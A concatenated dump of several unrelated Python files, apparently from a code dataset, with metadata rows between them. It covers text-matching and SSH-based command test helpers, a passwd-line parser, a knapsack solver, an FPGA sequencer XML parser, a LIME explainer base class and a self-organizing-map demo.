    """Search *content* for a literal substring.

    :param content: The content to be checked
    :param substring: Substring
    :param ignorecase: Specify whether the checking should ignore case
    :return: a match object if the substring occurs, None otherwise
    """
    search_flags = re.MULTILINE | (re.IGNORECASE if ignorecase else 0)
    return re.search(re.escape(substring), content, search_flags)
def check_keyword(content, keyword, ignorecase=False):
    """Search *content* for *keyword* as a whole word.

    :param content: The content to be checked
    :param keyword: Keyword
    :param ignorecase: Specify whether the checking should ignore case
    :return: a match object if the keyword occurs, None otherwise
    """
    search_flags = re.MULTILINE | (re.IGNORECASE if ignorecase else 0)
    pattern = r"\b" + re.escape(keyword) + r"\b"
    return re.search(pattern, content, search_flags)
def check_line(content, line, ignorecase=False):
    """Search *content* for an entire line equal to *line*.

    :param content: The content to be checked
    :param line: Line
    :param ignorecase: Specify whether the checking should ignore case
    :return: a match object if such a line exists, None otherwise
    """
    search_flags = re.MULTILINE | (re.IGNORECASE if ignorecase else 0)
    pattern = r"^" + re.escape(line) + r"$"
    return re.search(pattern, content, search_flags)
def check_substrings(content, substrings, ignorecase=False):
    """Check that every substring occurs in the content.

    :param content: The content to be checked
    :param substrings: Substrings
    :param ignorecase: Specify whether the checking should ignore case
    :return: True if all substrings are in the content
    """
    search_flags = re.MULTILINE | (re.IGNORECASE if ignorecase else 0)
    # all() short-circuits on the first missing substring, like the
    # original early break.
    return all(
        re.search(re.escape(fragment), content, search_flags)
        for fragment in substrings
    )
def check_no_substrings(content, keywords, ignorecase=False):
    """Check that none of the substrings occur in the content.

    :param content: The content to be checked
    :param keywords: Keywords
    :param ignorecase: Specify whether the checking should ignore case
    :return: True if no keyword is in the content
    """
    search_flags = re.MULTILINE | (re.IGNORECASE if ignorecase else 0)
    return not any(
        re.search(re.escape(fragment), content, search_flags)
        for fragment in keywords
    )
def check_keywords(content, keywords, ignorecase=False):
    """Check that every keyword occurs (as a whole word) in the content.

    :param content: The content to be checked
    :param keywords: Keywords
    :param ignorecase: Specify whether the checking should ignore case
    :return: True if all keywords are in the content
    """
    search_flags = re.MULTILINE | (re.IGNORECASE if ignorecase else 0)
    for keyword in keywords:
        logger.debug(f"checking {keyword}")
        # Stop at the first keyword that is missing.
        if not re.search(r"\b" + re.escape(keyword) + r"\b", content, search_flags):
            return False
    return True
def check_no_keywords(content, keywords, ignorecase=False):
    """Check that none of the keywords occur (as whole words) in the content.

    :param content: The content to be checked
    :param keywords: Keywords
    :param ignorecase: Specify whether the checking should ignore case
    :return: True if no keyword is in the content
    """
    search_flags = re.MULTILINE | (re.IGNORECASE if ignorecase else 0)
    return not any(
        re.search(r"\b" + re.escape(keyword) + r"\b", content, search_flags)
        for keyword in keywords
    )
def check_man_page_or_assert(cmd, ssh):
    """Assert that a man page exists for *cmd* on the remote host.

    :param cmd: Command whose man page is checked
    :param ssh: Open SSH session (SshUtil-like) used to run ``man``
    """
    basename = get_basename(cmd)  # NOTE(review): unused; kept for parity with siblings
    rc, result, error = ssh.send_command(f"man {cmd}")
    # If no man page, we will get "No manual" error.
    # In short, we should not get any error at all.
    # On Solaris some output arrives on the error stream even on success,
    # so the absence of a man page is detected via the exit code
    # (rc != 0 means "No manual" appeared) rather than by inspecting stderr.
    assert rc == 0 ,f"No man page for '{cmd}': {result}"
def check_help_page_or_assert(cmd, helpopt, ssh):
    """Assert that ``cmd helpopt`` prints a usage/help page.

    The output must contain both "usage" and the command's basename
    (case-insensitive whole-word match).

    :param cmd: Command under test
    :param helpopt: Help flag, e.g. "--help"
    :param ssh: Open SSH session used to run the command
    """
    basename = get_basename(cmd)
    keywords = ["usage", basename]
    logger.debug(basename)
    rc, result, error = ssh.send_command(f"{cmd} {helpopt}")
    content = ssh.to_string(result)
    logger.debug(content)
    log_ok_or_assert(check_keywords(content, keywords, True),
                     f"'{cmd} {helpopt}' shows help page",
                     f"'{cmd} {helpopt}' does not show help page")
def check_version_or_assert(cmd, veropt, dcver, ssh):
    """Assert that ``cmd veropt`` reports the expected version *dcver*.

    :param cmd: Command under test
    :param veropt: Version flag, e.g. "--version"
    :param dcver: Expected version string (d.d.d-ddd form)
    :param ssh: Open SSH session used to run the command
    """
    basename = get_basename(cmd)
    rc, result, error = ssh.send_command(f"{cmd} {veropt}")
    content = ssh.to_string(result)
    logger.debug(content)
    # get_version extracts the first d.d.d-ddd token from the output.
    version = get_version(content)
    log_ok_or_assert(version == dcver,
                     f"'{cmd} {veropt}' shows correct version {version}",
                     f"'{cmd} {veropt}' shows incorrect version {version}, "
                     f"the expected version is '{dcver}'")
class UserUnixProfile():
    """One /etc/passwd-style record: seven ':'-separated fields."""

    # Field order matches /etc/passwd: name:pw:uid:gid:gecos:home:shell
    _FIELDS = ('username', 'password', 'uid', 'gid', 'gecos', 'home_dir', 'shell')

    def __init__(self):
        # All fields start out as empty strings.
        for field in self._FIELDS:
            setattr(self, field, '')

    def load_str(self, s):
        """Populate the fields from a ':'-separated passwd line.

        :raises ValueError: if *s* does not split into exactly seven fields.
        """
        parts = s.split(':')
        if len(parts) != len(self._FIELDS):
            raise ValueError(f'Failed to split and load passwd string: "{s}"')
        for field, part in zip(self._FIELDS, parts):
            setattr(self, field, part)

    def __repr__(self):
        return ':'.join(getattr(self, field) for field in self._FIELDS)
| true |
97d0d2120b76fc91f4dc0124e7608ba070b85076 | Python | AdamC66/01---Reinforcing-Exercises-Programming-Fundamentals | /fundamentals.py | UTF-8 | 1,377 | 4.625 | 5 | [] | no_license | import random
# from random import randrange
# Exercise 1
# Create an emotions dict, where the keys are the names of different human emotions and the values are the degree to which the emotion is being felt on a scale from 1 to 3.
# Exercise 2
# Write a Person class with the following characteristics:
# name (string)
# emotions (dict)
# Initialize an instance of Person using your emotions dict from exercise 1.
# Exercise 3
# Add an instance method to your class that displays a message describing how the person is feeling. Substitute
# the words "high", "medium", and "low" for the emotion levels 1, 2, and 3.
# Exercise 1: emotion name -> intensity levels.
# NOTE(review): the exercise asks for a single degree (1-3) per emotion,
# but every value here is the full list of possible levels — confirm intent.
emotions = {
    'happy': [1, 2, 3],
    'sad': [1, 2, 3],
    'angry': [1, 2, 3],
    'elated': [1, 2, 3],
    'malaise': [1, 2, 3],
    'depressed': [1, 2, 3],
    'upset': [1, 2, 3],
    'excited': [1, 2, 3]
}
class Person:
    """A named person whose mood is reported at a random intensity."""

    def __init__(self, name, emotion):
        self.name = name        # display name
        self.emotion = emotion  # dict mapping emotion name -> levels

    def message(self):
        """Return a sentence describing how the person feels right now."""
        # Evaluate intensity first, then the emotion, matching the
        # left-to-right order of the original f-string.
        intensity = self.emotion_level()
        mood = self.rand_emotion()
        return f'{self.name} is feeling {intensity} {mood} today'

    def emotion_level(self):
        """Pick a random intensity word: "a little", "somewhat" or "very"."""
        # randrange(3) yields 0..2, mapped straight onto the three words.
        return ("a little", "somewhat", "very")[random.randrange(3)]

    def rand_emotion(self):
        """Pick one of this person's emotions at random."""
        return random.choice(list(self.emotion.keys()))
# Exercises 2/3: build a Person from the emotions dict and print one
# randomly generated mood message.
adam = Person('Adam', emotions)
print(adam.message())
a053e676c5adf5e03eb158e30b088f0cf6b64cc6 | Python | roman-4erkasov/coursera-data-structures-algorithms | /prj01_algorithmic_toolbox/week03wrk02_max_loot.py | UTF-8 | 1,829 | 4.3125 | 4 | [] | no_license | # Uses python3
"""
Task. The goal of this code problem is to implement an algorithm for the fractional knapsack problem.
Input Format. The first line of the input contains the number 𝑛 of items and the capacity 𝑊 of a knapsack. The next 𝑛 lines define the values and weights of the items. The 𝑖-th line contains integers 𝑣𝑖 and 𝑤𝑖—the value and the weight of 𝑖-th item, respectively.
Constraints. 1≤𝑛≤103,0≤𝑊 ≤2·106;0≤𝑣𝑖 ≤2·106,0<𝑤𝑖 ≤2·106 forall1≤𝑖≤𝑛.Allthe numbers are integers.
Output Format. Output the maximal value of fractions of items that fit into the knapsack. The absolute value of the difference between the answer of your program and the optimal value should be at most 10−3. To ensure this, output your answer with at least four digits after the decimal point (otherwise your answer, while being computed correctly, can turn out to be wrong because of rounding issues).
Sample 1.
Input:
> 3 50
> 60 20
> 100 50
> 120 30
Output:
> 180.0000
To achieve the value 180, we take the first item and the third item into the bag.
Sample 2.
Input:
1 10
500 30
Output:
> 166.6667
Here, we just take one third of the only available item.
"""
def max_value(items: list, W):
    """Greedy fractional knapsack: maximal value for capacity *W*.

    *items* holds (value-per-weight, weight, value) triples and is
    sorted in place by decreasing value-per-weight before filling.
    """
    items.sort(key=lambda triple: triple[0], reverse=True)
    total = 0
    remaining = W
    for density, weight, worth in items:
        if remaining == 0:
            break
        if weight < remaining:
            # The whole item fits.
            total += worth
            remaining -= weight
        else:
            # Take only the fraction that still fits.
            total += remaining * density
            remaining = 0
    return total
# Read "N W" on the first line, then N lines of "value weight"; print the
# maximal fractional-knapsack value.
inp = list(input().split())
assert len(inp) == 2
N = int(inp[0])    # number of items
W = float(inp[1])  # knapsack capacity
items = []
for _ in range(N):
    inp = list(input().split())
    v = float(inp[0]) # value
    w = float(inp[1]) # weight
    sgfce = v / w # significance
    items.append((sgfce, w, v))
print(max_value(items, W))
| true |
b66f42fb3a613b8789654642e59884921f6d608e | Python | lsst-camera-dh/pybench-ccd-reb | /camera/generic/rebxml.py | UTF-8 | 14,449 | 2.609375 | 3 | [] | no_license | #! /usr/bin/env python
#
# LSST
# Python minimal interface for the REB FPGA
# XML IO
#
from lxml import etree
from fpga import *
class XMLParser(object):
    """Parse a REB sequencer XML description (Python 2 code).

    Builds, from the XML tree: parameter and channel tables, FPGA clock
    Functions, and the subroutine/main instruction lists, assembled into
    an unassembled Program (see parse_tree for the returned tuple).
    """

    def __init__(self):
        # Parsed state, filled in by the parse_* methods.
        self.channels_desc = {}
        self.channels = {}
        self.parameters_desc = {}
        self.parameters = {}
        self.functions = {}
        self.functions_desc = {}
        self.subroutines = {}
        self.subroutines_names = []
        self.mains = {}
        self.mains_names = []
        self.unnamed_subroutine_num = 0

    def process_number(self, s):
        """Convert *s* to int (preferred) or float; 'Inf' passes through."""
        ss = s.strip()
        if s == 'Inf':
            return 'Inf'
        try:
            value = int(ss)
        except ValueError:
            value = float(ss)
        return value

    def process_value(self, s):
        """Resolve a value string to (number, unit).

        Named parameters are substituted first; a trailing 'ns'/'us'
        suffix becomes the unit, otherwise unit is None.
        """
        if not (isinstance(s, str)):
            return s, None
        ss = s.strip()
        # replace by the parameter
        # print ss
        if self.parameters.has_key(ss):
            lvalue = self.parameters[ss]
            # print "K lvalue = ", lvalue
        else:
            lvalue = ss
            # print "NK lvalue = ", lvalue
        # process the unit
        unit = None
        if lvalue[-2:] == 'ns':
            unit = 'ns'
            lvaluenum = lvalue[:-2].strip()
        elif lvalue[-2:] == 'us':
            unit = 'us'
            lvaluenum = lvalue[:-2].strip()
        # elif lvalue[-1:] == 's':
        #     unit = 's'
        #     lvaluenum = lvalue[:-1].strip()
        else:
            lvaluenum = lvalue
        # convert the numeral part
        value = self.process_number(lvaluenum)
        return value, unit

    def parse_parameters(self, parameters_node):
        """Fill parameters_desc/parameters from <parameter> nodes."""
        params = parameters_node.xpath('parameter')
        # print params
        for param in params:
            fullname = param.xpath('fullname/text()')[0]
            name = param.get('id')
            value = param.xpath('value/text()')[0]
            param_dict = {'value': value}
            if fullname != None:
                param_dict['fullname'] = fullname
            self.parameters_desc[name] = dict(param_dict)
        self.parameters = \
            dict([(k, self.parameters_desc[k]['value'])
                  for k in self.parameters_desc.keys()])

    def parse_channels(self, channels_node):
        """Fill channels_desc and the name<->rank BidiMap from <channel> nodes."""
        cs = channels_node.xpath('channel')
        # print cs
        for c in cs:
            fullname = c.xpath('fullname/text()')
            name = c.get('id')
            value = c.xpath('value/text()')[0]
            c_dict = {'channel': int(value),
                      'name': str(name)}
            if fullname != None:
                c_dict['fullname'] = fullname[0]
            self.channels_desc[name] = dict(c_dict)
        self.channels = bidi.BidiMap([v['channel']
                                      for v in self.channels_desc.values()],
                                     [v['name']
                                      for v in self.channels_desc.values()])

    def parse_functions(self, functions_node):
        """Build a Function per <function> node: constants, clock order,
        per-timeslice durations and 64-bit output words."""
        funcs = functions_node.xpath('function')
        # print funcs
        idfunc = 0
        for func in funcs:
            fullname = func.xpath('fullname/text()')[0]
            name = func.get('id')
            func_dict = {}
            func_dict['idfunc'] = idfunc
            if fullname != None:
                func_dict['fullname'] = fullname
            self.functions_desc[name] = dict(func_dict)
            print name, fullname
            function = Function(name=name,
                                fullname=fullname,
                                channels=self.channels)
            # analyzing constants
            constants = {}
            for const in func.xpath('constants/constant'):
                # print const
                channel = const.get('ref')
                # print channel
                # print const.xpath('text()')
                value = int(const.xpath('text()')[0])
                # print value
                constants[channel] = value
            # print constants
            # analyzing slices: map each clock name to its column in the
            # timeslice value strings
            channel_position = {}
            cpos = 0
            for clock in func.xpath('clocklist/clock'):
                # print clock
                cname = clock.get('ref')
                channel_position[cname] = cpos
                cpos += 1
            print channel_position
            # self.timelengths = {0: 12, 1: 14}
            # self.outputs = {0: '0b01001101...', 1: '0b1111000...', ... }
            timelengths = {}
            outputs = {}
            islice = 0
            for timeslice in func.xpath('slicelist/timeslice'):
                slice_id = timeslice.get('id')
                lduration = timeslice.xpath('duration/text()')[0]
                duration, unit = self.process_value(lduration)
                if unit == 'ns':
                    duration /= 10.0  # TODO: improve this
                if unit == 'us':
                    duration *= 100.0
                if islice == 0:
                    timelengths[islice] = int(duration) - 1  # FPGA adds one to duration of first slice
                elif islice == len(func.xpath('slicelist/timeslice')) - 1:
                    timelengths[islice] = int(duration) - 2  # FPGA adds 2 to duration of last slice
                else:
                    timelengths[islice] = int(duration)
                # Assemble the output word: one bit per channel rank, from
                # either the constant table or the timeslice value string.
                output = 0x0000000000000000
                svalue = timeslice.xpath('value/text()')[0].strip()
                for ck, cdesc in self.channels_desc.iteritems():
                    cname = cdesc['name']
                    crank = cdesc['channel']
                    if constants.has_key(cname):
                        # that's a constant one
                        output |= (constants[cname] << crank)
                    elif channel_position.has_key(cname):
                        cpos = channel_position[cname]
                        cval = int(svalue[cpos])
                        output |= (cval << crank)
                print bin(output)
                outputs[islice] = output
                islice += 1
            function.timelengths = dict(timelengths)
            function.outputs = dict(outputs)
            self.functions_desc[name]['function'] = function
            self.functions[name] = function
            idfunc += 1

    def parse_call(self, call_node):
        """
        Parse (recursively) a simple <call> node.

        A 'ref' attribute naming a known function becomes a CallFunction
        instruction; any other 'ref' becomes a JumpToSubroutine; a call
        with no 'ref' wraps its child <call>s into a generated unnamed
        subroutine. Return the instruction; update the subroutine tables.
        """
        # print " call"
        repeat = 1
        repeats = call_node.xpath('repeat/text()')
        if (repeats != None) and (len(repeats) >= 1):
            srepeat = repeats[0]
            lvalue, lunit = self.process_value(srepeat)
            repeat = lvalue
            # print " repeat = ", repeat
        if call_node.get('ref') != None:
            # print " calling", call_node.get('ref')
            called = str(call_node.get('ref')).strip()
            # is it a 'function' call?
            if self.functions_desc.has_key(called):
                infinite_loop = False
                if repeat == 'Inf':
                    infinite_loop = True
                    repeat = 1
                instr = Instruction(opcode=Instruction.OP_CallFunction,
                                    function_id=self.functions_desc[called]['idfunc'],
                                    infinite_loop=infinite_loop,
                                    repeat=repeat)
                print instr
                return instr
            # else, is it a 'subroutine' call (jump)?
            # do we check that the subroutine exists? even if defined later?
            # elif subs.has_key(called):
            else:
                instr = Instruction(opcode=Instruction.OP_JumpToSubroutine,
                                    subroutine=called,
                                    infinite_loop=False,
                                    repeat=repeat)
                print instr
                return instr
            # else:
            #     # undefined call...
            #     raise ValueError("Call to undefined object '%s'" % called)
        else:  # unnamed subroutine
            subcalls = call_node.xpath("call")
            unnamed = Subroutine()
            unnamed.name = "unnamed%04d" % self.unnamed_subroutine_num
            self.unnamed_subroutine_num += 1
            instr = Instruction(opcode=Instruction.OP_JumpToSubroutine,
                                subroutine=unnamed.name,
                                infinite_loop=False,
                                repeat=repeat)
            print instr
            print " unnamed subroutine", unnamed.name
            for subcall in subcalls:
                subinstr = self.parse_call(subcall)
                unnamed.instructions.append(subinstr)
            # Add the final RTS
            unnamed.instructions.append(
                Instruction(opcode=Instruction.OP_ReturnFromSubroutine))
            self.subroutines[unnamed.name] = unnamed
            self.subroutines_names.append(unnamed.name)
            return instr

    def parse_subroutine(self, sub_node):
        """Parse one <subroutine>/<main> node into a Subroutine ending in RTS."""
        # print "subroutine"
        subname = sub_node.get('id')
        fullname = sub_node.xpath('fullname/text()')[0]
        print " name = ", subname
        # print " fullname = ", fullname
        sub = Subroutine()
        sub.name = subname
        sub.fullname = fullname
        calls = sub_node.xpath('call')
        for call_node in calls:
            c_instr = self.parse_call(call_node)
            sub.instructions.append(c_instr)
        # Add the final RTS opcode at the end
        sub.instructions.append(
            Instruction(opcode=Instruction.OP_ReturnFromSubroutine))
        return sub

    def parse_subroutines(self, subroutines_node):
        """Parse every <subroutine> and register it by name (order kept)."""
        subs_nodes = subroutines_node.xpath('subroutine')
        for sub_node in subs_nodes:
            sub = self.parse_subroutine(sub_node)
            self.subroutines[sub.name] = sub
            self.subroutines_names.append(sub.name)

    def parse_mains(self, mains_node):
        """Parse every <main> (same structure as a subroutine)."""
        mains_nodes = mains_node.xpath('main')
        for main_node in mains_nodes:
            main = self.parse_subroutine(main_node)
            self.mains[main.name] = main
            self.mains_names.append(main.name)

    def parse_tree(self, tree_node):
        """Parse the whole XML tree and assemble the unassembled program.

        :return: (program, functions_desc, parameters_desc, channels_desc)
        """
        self.unnamed_subroutine_num = 0
        # Get the parameters
        parameters_node = tree_node.xpath(
            '/sequencer/sequencer-config/parameters')
        # print parameters_node
        parameters_node = parameters_node[0]
        self.parse_parameters(parameters_node)
        # parse the channel descriptions
        channels_node = tree_node.xpath('/sequencer/sequencer-config/channels')
        channels_node = channels_node[0]
        self.parse_channels(channels_node)
        # parse the sequencer functions
        functions_node = tree_node.xpath(
            '/sequencer/sequencer-config/functions')
        functions_node = functions_node[0]
        self.parse_functions(functions_node)
        # Parse all subroutines
        subroutines_node = tree_node.xpath(
            '/sequencer/sequencer-routines/subroutines')
        subroutines_node = subroutines_node[0]
        self.parse_subroutines(subroutines_node)
        print "SUBS", self.subroutines_names
        # Parse all 'mains'
        mains_node = tree_node.xpath('/sequencer/sequencer-routines/mains')
        mains_node = mains_node[0]
        self.parse_mains(mains_node)
        print "MAINS", self.mains_names
        # TODO: Modify for new sequencer: mains should now be written in memory as mains with END at the end,
        # we will use 0x340000 to point to the right one.
        allsubs = dict(self.mains)
        allsubs.update(self.subroutines)
        allsubsnames = self.mains_names + self.subroutines_names
        # Produce a minimal main (a jump (JSR) and end-of-program (END))
        # It points to the first 'main'.
        supermain = [Instruction(opcode=Instruction.OP_JumpToSubroutine,
                                 subroutine=self.mains_names[0]),
                     Instruction(opcode=Instruction.OP_EndOfProgram)]
        # Create the unassembled program
        self.prg = Program_UnAssembled()
        self.prg.subroutines = allsubs  # key = name, value = subroutine object
        self.prg.subroutines_names = allsubsnames  # to keep the order
        self.prg.instructions = supermain  # main program instruction list
        return ( self.prg,
                 self.functions_desc,
                 self.parameters_desc,
                 self.channels_desc )

    def parse_file(self, xmlfile):
        """Parse the XML file at *xmlfile* (see parse_tree for the result)."""
        tree = etree.parse(xmlfile)
        return self.parse_tree(tree)

    def validate_file(self, xmlfile):
        """
        To implement. DTD/schema available???
        """
        return True
# @classmethod
# def fromxmlfile(cls, xmlfile):
def fromxmlfile(xmlfile):
    """
    Create and return a Sequencer instance from a XML file.

    The file is parsed with XMLParser, the unassembled program is compiled,
    the channel descriptions are turned into a bidirectional
    number <-> name map, and parameter values are converted to int whenever
    possible (kept as strings otherwise).

    Raise an exception if the syntax is wrong.
    """
    parser = XMLParser()
    (prg,
     functions_desc,
     parameters_desc,
     channels_desc) = parser.parse_file(xmlfile)
    program = prg.compile()
    # Bidirectional lookup: channel number <-> channel name.
    channels = bidi.BidiMap([v['channel'] for v in channels_desc.values()],
                            [v['name'] for v in channels_desc.values()])
    # Map each function id to its function object.
    # (.values() instead of the Python-2-only .iteritems(); the key was unused.)
    functions = {}
    for desc in functions_desc.values():
        functions[desc['idfunc']] = desc['function']
    # Parameter values come out of the XML as strings; convert the numeric
    # ones to int and keep the others verbatim.  The original used a bare
    # ``except:`` which would also have swallowed unrelated errors.
    parameters = {}
    for name in parameters_desc:
        parameter_string = parameters_desc[name]['value']
        try:
            parameters[name] = int(parameter_string)
        except (ValueError, TypeError):
            # Not an integer literal: keep the raw value.
            parameters[name] = parameter_string
    seq = Sequencer(channels=channels,
                    channels_desc=channels_desc,
                    functions=functions,
                    functions_desc=functions_desc,
                    program=program,
                    parameters=parameters)
    return seq

# Attach as a static alternate constructor: Sequencer.fromxmlfile(xmlfile).
Sequencer.fromxmlfile = staticmethod(fromxmlfile)
# tree = etree.parse('sequencer-soi.xml')
# P = XMLParser()
# pr,fu = P.parse_file('sequencer-soi.xml')
| true |
472b233732864fef2bf95a94e3369c46d6efa08e | Python | mahikajain3/dlime_experiments | /explainer_base.py | UTF-8 | 5,650 | 2.640625 | 3 | [
"MIT"
] | permissive | import numpy as np
from boruta import BorutaPy
from sklearn.ensemble import RandomForestRegressor
from sklearn.linear_model import Ridge, lars_path
from sklearn.utils import check_random_state
class LimeBase(object):
    """Fit a locally-weighted, sparse linear (ridge) model around a single
    instance, given a neighborhood of perturbed samples, to explain a
    black-box prediction."""

    def __init__(self,
                 kernel_fn,
                 verbose=False,
                 random_state=None):
        """
        Args:
            kernel_fn: function mapping an array of distances to an array of
                proximity weights (one weight per neighborhood sample).
            verbose: if True, print intercept / local-prediction details.
            random_state: seed or RandomState used by the linear models.
        """
        self.kernel_fn = kernel_fn
        self.verbose = verbose
        self.random_state = check_random_state(random_state)

    @staticmethod
    def generate_lars_path(weighted_data, weighted_labels):
        """Compute the LARS/lasso regularization path.

        Returns:
            (alphas, coefs): regularization values and the coefficient
            matrix (n_features x n_alphas) along the path.
        """
        x_vector = weighted_data
        alphas, _, coefs = lars_path(x_vector,
                                     weighted_labels,
                                     method='lasso',
                                     verbose=False)
        return alphas, coefs

    def forward_selection(self, data, labels, weights, num_features):
        """Greedy forward selection: repeatedly add the single feature that
        most improves the weighted ridge-regression score."""
        clf = Ridge(alpha=0, fit_intercept=True, random_state=self.random_state)
        used_features = []
        for _ in range(min(num_features, data.shape[1])):
            # -inf instead of the original magic sentinel -100000000, which
            # could mask candidates with extremely poor scores.
            max_ = -float('inf')
            best = 0
            for feature in range(data.shape[1]):
                if feature in used_features:
                    continue
                clf.fit(data[:, used_features + [feature]], labels,
                        sample_weight=weights)
                score = clf.score(data[:, used_features + [feature]],
                                  labels,
                                  sample_weight=weights)
                if score > max_:
                    best = feature
                    max_ = score
            used_features.append(best)
        return np.array(used_features)

    def feature_selection(self, data, labels, weights, num_features, method):
        """Select up to num_features feature indices with the given strategy.

        Supported methods: 'none', 'forward_selection', 'highest_weights',
        'lasso_path', 'auto' (dispatches on num_features), 'boruta'.
        """
        if method == 'none':
            return np.array(range(data.shape[1]))
        elif method == 'forward_selection':
            return self.forward_selection(data, labels, weights, num_features)
        elif method == 'highest_weights':
            clf = Ridge(alpha=0, fit_intercept=True,
                        random_state=self.random_state)
            clf.fit(data, labels, sample_weight=weights)
            # Rank features by |coefficient * value at the explained row|.
            # Bug fix: enumerate features with data.shape[1]; the original
            # used data.shape[0] (the sample count), and zip() would have
            # silently truncated the ranking whenever there were fewer
            # samples than features.
            feature_weights = sorted(zip(range(data.shape[1]),
                                         clf.coef_ * data[0]),
                                     key=lambda x: np.abs(x[1]),
                                     reverse=True)
            return np.array([x[0] for x in feature_weights[:num_features]])
        elif method == 'lasso_path':
            # Weighted centering so the lasso path reflects sample weights.
            weighted_data = ((data - np.average(data, axis=0, weights=weights))
                             * np.sqrt(weights[:, np.newaxis]))
            weighted_labels = ((labels - np.average(labels, weights=weights))
                               * np.sqrt(weights))
            nonzero = range(weighted_data.shape[1])
            _, coefs = self.generate_lars_path(weighted_data,
                                               weighted_labels)
            # Walk the path from least to most regularized until at most
            # num_features coefficients stay non-zero.
            for i in range(len(coefs.T) - 1, 0, -1):
                nonzero = coefs.T[i].nonzero()[0]
                if len(nonzero) <= num_features:
                    break
            used_features = nonzero
            return used_features
        elif method == 'auto':
            # Forward selection is accurate but needs O(k * d) model fits;
            # fall back to the cheaper ranking for larger explanations.
            if num_features <= 6:
                n_method = 'forward_selection'
            else:
                n_method = 'highest_weights'
            return self.feature_selection(data, labels, weights, num_features, n_method)
        elif method == 'boruta':
            rf = RandomForestRegressor(n_jobs=-1)
            feat_selector = BorutaPy(rf, n_estimators='auto', verbose=2, random_state=1)
            feat_selector.fit(data, labels)
            return np.where(feat_selector.support_)[0]

    def explain_instance_with_data(self,
                                   neighborhood_data,
                                   neighborhood_labels,
                                   distances,
                                   label,
                                   num_features,
                                   feature_selection='auto',
                                   model_regressor=None,
                                   regressor='linear'):
        """Fit the interpretable model on the neighborhood and return the
        explanation.

        Args:
            neighborhood_data: perturbed samples; row 0 is the instance
                being explained.
            neighborhood_labels: black-box predictions for those samples.
            distances: distance of each sample to the explained instance.
            label: column of neighborhood_labels to explain.
            num_features: maximum number of features in the explanation.
            feature_selection: strategy name passed to feature_selection().
            model_regressor: optional pre-built regressor (default: Ridge).
            regressor: kept for interface compatibility; unused here.

        Returns:
            (intercept,
             [(feature_index, weight), ...] sorted by |weight| descending,
             R^2 score of the local model on the neighborhood,
             local prediction for the explained instance)
        """
        weights = self.kernel_fn(distances)
        labels_column = neighborhood_labels[:, label]
        used_features = self.feature_selection(neighborhood_data,
                                               labels_column,
                                               weights,
                                               num_features,
                                               feature_selection)
        if model_regressor is None:
            model_regressor = Ridge(alpha=1, fit_intercept=True,
                                    random_state=self.random_state)
        easy_model = model_regressor
        easy_model.fit(neighborhood_data[:, used_features],
                       labels_column, sample_weight=weights)
        prediction_score = easy_model.score(
            neighborhood_data[:, used_features],
            labels_column, sample_weight=weights)
        local_pred = easy_model.predict(neighborhood_data[0, used_features].reshape(1, -1))
        if self.verbose:
            print('Intercept', easy_model.intercept_)
            print('Prediction_local', local_pred,)
            print('Right:', neighborhood_labels[0, label])
        return (easy_model.intercept_,
                sorted(zip(used_features, easy_model.coef_),
                       key=lambda x: np.abs(x[1]), reverse=True),
                prediction_score, local_pred)
69bb31017fada8da3a1dd17de5161895db175328 | Python | HxLyn3/Machine-Learning | /05 Neural Network/5.8/test.py | UTF-8 | 2,529 | 2.796875 | 3 | [] | no_license | """
- Author: Haoxin Lin
- E-mail: linhx36@outlook.com
- Date: 2020/11/25
- Brief: Test Self-Organizing Network with watermelon dataset 3.0alpha
"""
import xlrd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
from SOM import SOM

# load data: watermelon dataset 3.0alpha from the Excel workbook.
data = xlrd.open_workbook('../WTMLDataSet_3.0alpha.xlsx')
table = data.sheet_by_name('WTML')
dataset = []
for i in range(table.nrows):
    line = table.row_values(i)
    dataset.append(line)
dataset = np.array(dataset)
# Drop the header row ([1:]); features are the middle columns, the label is
# the last column ('是' marks the positive class).
xs = dataset[1:, 1:-1].astype(np.float64)
ys = (dataset[1:, -1]=='是').astype(np.int32)
# Train an 8x8 self-organizing map on the 2-D features.
SOMNet = SOM(xs.shape[1], map_shape=[8, 8])
SOMNet.learn(xs, steps=1000, batch_size=17)
# plot data (before mapping)
plt.figure()
positive_xs = xs[ys==1]
negative_xs = xs[ys==0]
plt.scatter(positive_xs[:, 0], positive_xs[:, 1], marker='o', c='w', edgecolors='#00CED1', s=80, label='Great (positive)')
plt.scatter(negative_xs[:, 0], negative_xs[:, 1], marker='s', c='w', edgecolors='#DC143C', s=80, label='Awful (negative)')
plt.legend(loc="upper right", bbox_to_anchor=(1.01, 1.16))
# map each sample to its best-matching unit on the SOM grid
mapped_xs = SOMNet.forward(xs)
# +0.5 centers the markers inside their grid cells.
positive_xs = mapped_xs[ys==1] + 0.5
negative_xs = mapped_xs[ys==0] + 0.5
# plot data (after mapping)
plt.figure()
plt.scatter(positive_xs[:, 0], positive_xs[:, 1], marker='o', c='w', edgecolors='#00CED1', s=80, label='Great (positive)')
plt.scatter(negative_xs[:, 0], negative_xs[:, 1], marker='s', c='w', edgecolors='#DC143C', s=80, label='Awful (negative)')
plt.axis([0, SOMNet.map_shape[0], 0, SOMNet.map_shape[1]])
ax = plt.gca()
ax.invert_yaxis()
plt.grid(linestyle='-.')
plt.legend(loc="upper right", bbox_to_anchor=(1.01, 1.16))
# distribution at each mapped position: one pie chart per occupied cell
plt.figure()
plt.axes(aspect='equal')
the_grid = GridSpec(SOMNet.map_shape[0], SOMNet.map_shape[1])
colors = ['C0', 'C1']
for idx in range(SOMNet.map_shape[0]*SOMNet.map_shape[1]):
    # Flat cell index -> (row, col) grid position.
    pos = np.array([idx//SOMNet.map_shape[1], idx%SOMNet.map_shape[1]])
    # Only draw a pie if at least one sample mapped exactly to this cell.
    if 0 in np.sum((mapped_xs-pos)**2, axis=-1):
        plt.subplot(the_grid[pos[1], pos[0]], aspect=1)
        ys_at_this_pos = ys[np.sum((mapped_xs-pos)**2, axis=-1)==0]
        pnum = np.sum(ys_at_this_pos)
        nnum = len(ys_at_this_pos) - pnum
        plt.pie(x=[pnum, nnum], colors=colors, labels=['Great (positive)', 'Awful (negative)'], textprops={'fontsize': 0, 'color': 'w'})
        # Overlay the total sample count for this cell.
        plt.text(pos[0]/100, pos[1]/100, str(pnum+nnum), color='black', fontdict={'weight': 'bold', 'size': 10}, va='center', ha='center')
plt.legend(loc="upper right", bbox_to_anchor=(4, 3))
plt.show()
| true |
d78041298d13b948c3c9ba8fb46bee854145b6fe | Python | bmasoumi/BioInfoMethods | /NaiveExactMatching.py | UTF-8 | 4,395 | 3.421875 | 3 | [] | no_license | #!/usr/bin/env python3
